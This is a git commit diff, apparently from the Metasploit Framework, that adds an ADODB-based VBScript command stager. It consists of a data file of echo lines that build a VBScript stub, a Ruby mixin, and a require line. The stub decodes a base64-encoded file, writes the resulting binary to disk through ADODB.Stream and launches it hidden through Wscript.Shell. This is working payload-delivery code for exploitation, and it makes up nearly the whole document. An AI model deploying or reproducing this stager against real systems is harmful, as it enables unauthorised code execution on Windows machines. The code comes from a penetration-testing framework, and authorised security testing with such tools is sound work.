add an adodb based cmdstager, fixes #1431
git-svn-id: file:///home/svn/framework3/trunk@11247 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
9c1576b20e
commit
fbd340aae8
|
@ -0,0 +1,50 @@
|
|||
echo Dim var_origLoc >>decode_stub
|
||||
echo var_origLoc = SetLocale(1033) >>decode_stub
|
||||
echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
|
||||
echo Set file = fs.GetFile("ENCODED") >>decode_stub
|
||||
echo If file.Size Then >>decode_stub
|
||||
echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
|
||||
echo data = fd.ReadAll >>decode_stub
|
||||
echo data = Replace(data, vbCrLf, "") >>decode_stub
|
||||
echo data = base64_decode(data) >>decode_stub
|
||||
echo fd.Close >>decode_stub
|
||||
echo Dim var_strmConv, var_writedir, var_writestream >>decode_stub
|
||||
echo var_writedir = "DECODED" >>decode_stub
|
||||
echo Set var_strmConv = CreateObject("ADODB.Stream") >>decode_stub
|
||||
echo var_strmConv.Type = 2 >>decode_stub
|
||||
echo var_strmConv.Charset = "x-ansi" >>decode_stub
|
||||
echo var_strmConv.Open >>decode_stub
|
||||
echo var_strmConv.WriteText data, 0 >>decode_stub
|
||||
echo var_strmConv.Position = 0 >>decode_stub
|
||||
echo var_strmConv.Type = 1 >>decode_stub
|
||||
echo var_strmConv.SaveToFile var_writedir, 2 >>decode_stub
|
||||
echo SetLocale(var_origLoc) >>decode_stub
|
||||
echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
|
||||
echo shell.run "DECODED", 0, false >>decode_stub
|
||||
echo Else >>decode_stub
|
||||
echo Wscript.Echo "The file is empty." >>decode_stub
|
||||
echo End If >>decode_stub
|
||||
echo Function base64_decode(byVal strIn) >>decode_stub
|
||||
echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
|
||||
echo For n = 1 To Len(strIn) Step 4 >>decode_stub
|
||||
echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
|
||||
echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
|
||||
echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
|
||||
echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
|
||||
echo If Not w2 Then _ >>decode_stub
|
||||
echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
|
||||
echo If Not w3 Then _ >>decode_stub
|
||||
echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
|
||||
echo If Not w4 Then _ >>decode_stub
|
||||
echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
|
||||
echo Next >>decode_stub
|
||||
echo base64_decode = strOut >>decode_stub
|
||||
echo End Function >>decode_stub
|
||||
echo Function mimedecode(byVal strIn) >>decode_stub
|
||||
echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
|
||||
echo If Len(strIn) = 0 Then >>decode_stub
|
||||
echo mimedecode = -1 : Exit Function >>decode_stub
|
||||
echo Else >>decode_stub
|
||||
echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
|
||||
echo End If >>decode_stub
|
||||
echo End Function >>decode_stub
|
|
@ -0,0 +1,39 @@
|
|||
##
|
||||
# $Id: $
|
||||
##
|
||||
|
||||
require 'msf/core/exploit/cmdstager'
|
||||
|
||||
module Msf
|
||||
|
||||
###
|
||||
#
|
||||
# This mixin provides an interface for staging cmd to arbitrary payloads
|
||||
#
|
||||
###
|
||||
module Exploit::CmdStagerVBS::ADODB
|
||||
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptString.new( 'DECODERSTUB', [ true, 'The VBS base64 file decoder stub to use.',
|
||||
File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def create_stager(exe)
|
||||
Rex::Exploitation::CmdStagerVBS.new(exe)
|
||||
end
|
||||
|
||||
def execute_cmdstager(opts = {})
|
||||
opts.merge!({ :decoder => datastore['DECODERSTUB'] })
|
||||
super
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
|
@ -18,6 +18,7 @@ require 'msf/core/exploit/exe'
|
|||
# CmdStagers
|
||||
require 'msf/core/exploit/cmdstager'
|
||||
require 'msf/core/exploit/cmdstager_vbs'
|
||||
require 'msf/core/exploit/cmdstager_vbs_adodb'
|
||||
require 'msf/core/exploit/cmdstager_debug_write'
|
||||
require 'msf/core/exploit/cmdstager_debug_asm'
|
||||
require 'msf/core/exploit/cmdstager_tftp'
|
||||
|
|
Loading…
Reference in New Issue